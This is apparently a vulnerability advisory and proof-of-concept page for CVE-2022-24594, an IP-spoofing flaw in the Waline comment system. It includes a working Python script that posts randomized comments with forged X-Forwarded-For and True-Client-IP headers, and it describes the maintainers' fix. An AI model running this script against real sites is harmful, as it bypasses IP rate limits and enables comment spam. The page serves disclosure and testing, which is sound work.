Headline
CVE-2022-24594: [Bug]: waline fake any ip vulnerability · Issue #785 · walinejs/waline
In waline 1.6.1, an attacker can submit messages using X-Forwarded-For to forge any IP address.
问题描述 | Describe the bug****waline-fake-any-ip-poc
A Proof-Of-Concept for the recently found waline fake any ip vulnerability.
In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.
Proof-of-concept (POC)
As a PoC we have created a python file that automates the process.
Requirements:****Usage:****Source:
####### poc.py #======= Disclaimer: ========================================================================================# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #===========================================================================================================# import requests import random
def getRandStr(len): str="" dict = “0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ” for i in range(len): str = str + random.choice(dict) return str
attack_url = “https://waline-test-poc.vercel.app” # This is an attack url
fake_ip = "This is a fake IP " + getRandStr(6) # This is a fake IP or any other string
headers ={} headers[‘User-Agent’]="Mozilla/5.0 test " + getRandStr(6) headers[‘X-Forwarded-For’]= “0.0.0.0” headers[‘True-Client-IP’]= fake_ip # fake ip
data={ "comment": "test comment " + getRandStr(6), "nick": "test nick " + getRandStr(6), "mail": getRandStr(6) + "@test.com", "link": “https://” + getRandStr(6) + ".com", "ua": "Mozilla/5.0 test " + getRandStr(6), "url": "/", } res=requests.post(url = attack_url + "/comment", headers = headers, data = data) print(res.text)
Result:
Our vulnerable application
waline deploy:
- @waline/vercel 1.6.0
- @waline/client 1.5.2
data store:
- LeannCloud
get started:
https://waline.js.org/guide/get-started.html
Influence
IP-based comment posting frequency limits IPQPS may be rendered useless.
This vulnerability can be used to fake the IP address and bypass the IP frequency limit of the comment system software(waline), so that the comment system administrator cannot accurately obtain the IP address of the sender.
Reason
This vulnerability is usually caused by a misconfiguration on the server side.
References
- #785
- #792
Exploit in the field
According to the issues of Github of the project waline, from July 18 to July 20, 2021, an attacker bombarded all websites using Waline by Posting spam comments with faked IP addresses, so it is speculated that this vulnerability has been exploited in the field.
- #786
- #430
- #424
- #427
Solutions
Software maintainers have provided a solution to this vulnerability.
There is nothing we can do about it on vercel. But we should be able to block these requests on a self hold env.(#792 (reply in thread))
In self host mode, we can set maxIpsCount to proxy server layers to get a real ip. https://koajs.com/#settings (#792 (reply in thread))
Disclaimer
This repository is not intended to be a one-click exploit to waline fake any ip vulnerability. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.
LICENSE
BSD 3-Clause License
Copyright (c) 2022, ihackerx
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
问题网站 | Website URL
https://waline.js.org
服务部署在哪里? | Where your waline deploy?
Vercel (Default)
数据存储在哪里?| Where your comment data store?
LeanCloud(https://leancloud.app)